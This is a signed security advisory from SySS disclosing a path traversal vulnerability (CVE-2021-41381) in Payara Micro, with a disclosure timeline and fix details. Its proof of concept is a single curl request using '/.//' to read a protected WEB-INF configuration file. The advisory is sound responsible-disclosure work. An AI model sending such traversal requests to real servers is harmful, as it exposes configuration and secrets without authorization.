-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-054 Product: Payara® Micro Community Manufacturer: 2021 Payara Services Ltd Affected Version(s): 5.2021.6 (JAR) and below (?) Tested Version(s): 5.2021.6 (JAR) Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2021-08-26 Solution Date: 2021-09-16 Public Disclosure: 2021-09-22 CVE Reference: CVE-2021-41381 Author of Advisory: Thibaud Kehler, Oliver Maicher, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Payara® Micro Enterprise & Community are Java web servers. The manufacturer describes the product as follows (see [1]): "Payara Micro Enterprise is the lightweight middleware platform of choice for containerized Jakarta EE application deployments. Less than 80MB, Payara Micro requires no installation, configuration, or code rewrites – so you can build and deploy a fully working app within minutes." Due to a specific configuration, it is vulnerable to path traversal and therefore resource exposure within the web application archive (.war file). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Deploying an application with the "contextroot" flag makes it vulnerable to path traversal attacks. "$ java -jar payara-micro.jar --deploy /home/user/myexample.war --contextroot /" myexample.war has the following structure: . ├── WEB-INF │ ├── classes │ │ └── META-INF │ │ └── microprofile-config.properties │ └── META-INF ├── META-INF │ └── MANIFEST.MF └── index.xhtml ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): With "contextroot" set, it is possible to traverse into the WEB-INF folder and read files, for instance. Request: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties Response: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Mitigate path traversal via "/.//". More information: https://blog.payara.fish/whats-new-in-the-september-2021-payara-platform-release?utm_campaign=Payara%20New%20Releases&utm_medium=email&_hsmi=159750318&_hsenc=p2ANqtz--Bem7TF3R_4WP_aaS7DAmJMCV7ivzXHpjOIcIH6Wb2OATFHJMwKhaatkR8iSIOrIdRlwCTH0UavIEU8QKkvKDGKvUHeA&utm_content=159750318&utm_source=hs_email ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-08-26: Vulnerability reported to manufacturer 2021-09-15: Release of update and vulnerability fix 2021-09-22: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Payara® Micro Enterprise https://www.payara.fish/products/payara-micro/ [2] SySS Security Advisory SYSS-2021-054 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler and Oliver Maicher of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc Key ID: 0xB6457D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQGzBAEBCgAdFiEEN3sQKd08ITCK8zmrKBT3NJWK3okFAmFLG70ACgkQKBT3NJWK 3ok8XwwAnUfbspF6ffcaXKpXSgkAhrfWuDLQQ+tmDyf7LnIz+ngglMYFw5bWiqTp U2TJeCbqf+16kyKieFXxcsjXVfFsmPQYOz/TNvbyWnJ7o8Vmgdh8mZLG9L29bGAa uv6iKrvJJtGdyFdxOh6Dl40//5WGJiAvXcCYhbnRpaz7AjrZM0p6uCt2V8rniblb eDzHAOPYZ5Snqu8o20lJbtV/5JnCLcUEaM9uVDHnCdcszfQrC/9kQY33xLWemfiP tfmUczMavX58qnVSnH5OzXeMNPJAYWbZSX8lxyr2NWH2hUqtT9bRnoo7xF+sfNxb RwmmYYqzFa45KBiatbCrbQaK34JCCQtnK8xBQmTER/HCaR0wdYIWXkNz1cSA7H8m djVn8jrl5cWt3iGPvRU2ymkofaHTCidNfCVoNFgDVoNmtr1wWye3jE+++tBYvrz9 5vMbkWAFymd5SeKppZ2QkBZgLhpff4qFdh2u0LSt4m/3a7enF2jJNjnpLT8VZ23t XkrAhjYy =LTcA -----END PGP SIGNATURE-----